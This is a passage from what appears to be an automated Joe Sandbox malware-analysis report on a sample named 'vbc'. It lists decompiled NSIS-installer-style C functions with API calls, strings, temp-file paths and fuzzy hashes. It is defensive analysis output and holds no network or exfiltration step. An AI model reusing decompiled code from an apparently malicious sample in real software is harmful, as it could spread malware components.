					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405dea
0x00405df7
0x00405df8
0x00405e03
0x00405e0b
0x00405e0b
0x00405e13

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
CharPrevW.USER32(?,00000000), ref: 00405DF9
lstrcatW.KERNEL32 ref: 00405E0B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD

Uniqueness

Uniqueness Score: -1.00%

Function 734F10E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E734F10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x734f506c = _a8;
				 *0x734f5070 = _a16;
				 *0x734f5074 = _a12;
				_a12( *0x734f5048, E734F1651, _t73);
				_t66 =  *0x734f506c +  *0x734f506c * 4 << 3;
				_t27 = E734F12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x734f5040;
							if( *0x734f5040 == 0) {
								goto L26;
							}
							E734F1603( *0x734f5074, _t31 + 4, _t66);
							_t34 =  *0x734f5040;
							_t86 = _t86 + 0xc;
							 *0x734f5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E734F1312(E734F135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E734F1381(_t80, E734F12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E734F1603(_t10,  *0x734f5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x734f5040;
							 *0x734f5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x734f5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E734F1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x734f506c +  *0x734f506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E734F1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x734f5070);
						 *( *0x734f5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x734f10eb
0x734f1100
0x734f1109
0x734f110e
0x734f1119
0x734f111c
0x734f1125
0x734f1129
0x734f112b
0x734f12b0
0x734f12ba
0x734f12ba
0x734f1132
0x734f1132
0x734f1137
0x734f1138
0x734f113a
0x734f113d
0x734f1256
0x734f1259
0x734f1271
0x734f1271
0x734f1278
0x00000000
0x00000000
0x734f1285
0x734f128a
0x734f128f
0x734f1294
0x734f129a
0x734f129b
0x00000000
0x734f129b
0x734f125b
0x734f125e
0x734f11bc
0x734f11bf
0x734f11c2
0x734f11cb
0x734f11d0
0x00000000
0x734f11d1
0x734f1264
0x734f1266
0x734f11a2
0x734f11a5
0x734f11a8
0x734f11b1
0x00000000
0x734f11b1
0x734f1164
0x734f1165
0x734f1177
0x734f1180
0x734f1184
0x734f118e
0x734f1191
0x734f1193
0x734f1193
0x00000000
0x734f1165
0x734f1143
0x734f1218
0x734f121d
0x734f1221
0x734f1223
0x734f122c
0x734f122f
0x734f1238
0x734f123d
0x734f123d
0x734f1247
0x734f124a
0x00000000
0x734f1250
0x734f1149
0x734f114c
0x734f11e9
0x734f11ed
0x734f11f7
0x734f11fb
0x734f1205
0x734f120a
0x734f1211
0x00000000
0x734f1211
0x734f1152
0x734f1155
0x00000000
0x00000000
0x734f115b
0x734f115e
0x734f11b8
0x00000000
0x734f11b8
0x734f1160
0x734f1162
0x734f119e
0x00000000
0x734f119e
0x00000000
0x734f12a1
0x734f12a1
0x734f12ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 734F1171
GlobalAlloc.KERNEL32(00000040,?), ref: 734F11E3
GlobalFree.KERNEL32 ref: 734F124A
GlobalFree.KERNEL32(?), ref: 734F129B
GlobalFree.KERNEL32(00000000), ref: 734F12B1

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 7e00feaecf6a4ead55bf7f79202ba088aa16e3caec578b435fc7449cb293885c
Instruction ID: 3ab0df95bbb567b403e9c173cf8a5ab9edbb08b8339baf1c54f5d1a4baf8521b
Opcode Fuzzy Hash: 7e00feaecf6a4ead55bf7f79202ba088aa16e3caec578b435fc7449cb293885c
Instruction Fuzzy Hash: 23515CB6900203DFE708EFA9D944B167BF8EB08315B1D415AE94AEB350E734DA11CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040653C("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp", "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040647A(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
						_t14 = E004060BC(_t31, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll
API String ID: 1659193697-2885240288
Opcode ID: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
Opcode Fuzzy Hash: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x79f700; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a6c;
						if(_t2 >  *0x7a8a6c) {
							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
							 *0x79f700 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406923(0);
					}
				} else {
					_t6 =  *0x79f700; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79f700 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32 ref: 0040302C
GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040304A
CreateDialogParamW.USER32 ref: 00403067
ShowWindow.USER32(00000000,00000005), ref: 00403075

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004054F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f34 = _t16;
							E00404EB1();
						}
						L11:
						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E31(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044C2(0x413);
				return 0;
			}

0x004054f4
0x004054fe
0x0040551a
0x0040553c
0x0040553f
0x00405545
0x0040554f
0x00405550
0x00405552
0x00405558
0x00405558
0x00405562
0x00000000
0x00405570
0x00405527
0x0040555f
0x0040555f
0x00000000
0x0040555f
0x00405533
0x00405535
0x00000000
0x00405535
0x00405504
0x00000000
0x00000000
0x0040550b
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040551F
CallWindowProcW.USER32(?,?,?,?), ref: 00405570

Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4

Strings

, xrefs: 00405500

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69

Uniqueness

Uniqueness Score: -1.00%

Function 004063E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004063f6
0x004063f8
0x00406410
0x00406415
0x0040641a
0x00406458
0x00406458
0x0040641c
0x0040642e
0x00406439
0x0040643f
0x0040644a
0x00000000
0x00000000
0x0040644a
0x0040645e

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 0040642E
RegCloseKey.ADVAPI32(?), ref: 00406439

Strings

Call, xrefs: 004063EF

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B34() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79ff0c; // 0x9e8440
				_t3 = E00403B19(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79ff0c =  *0x79ff0c & 0x00000000;
				return _t3;
			}

0x00403b35
0x00403b3d
0x00403b44
0x00403b47
0x00403b47
0x00403b49
0x00403b4e
0x00403b55
0x00403b5b
0x00403b5f
0x00403b60
0x00403b68

APIs

FreeLibrary.KERNEL32(?,7556D4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
GlobalFree.KERNEL32(009E8440), ref: 00403B55

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4017390910
Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F6F Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405f7f
0x00405f81
0x00405f84
0x00405fb0
0x00405f89
0x00405f92
0x00405f97
0x00405fa2
0x00405fa5
0x00405fc1
0x00405fa7
0x00405fae
0x00000000
0x00405fae
0x00405fba
0x00405fbe
0x00405fbe
0x00405fb8
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F97
CharNextA.USER32(00000000), ref: 00405FA8
lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
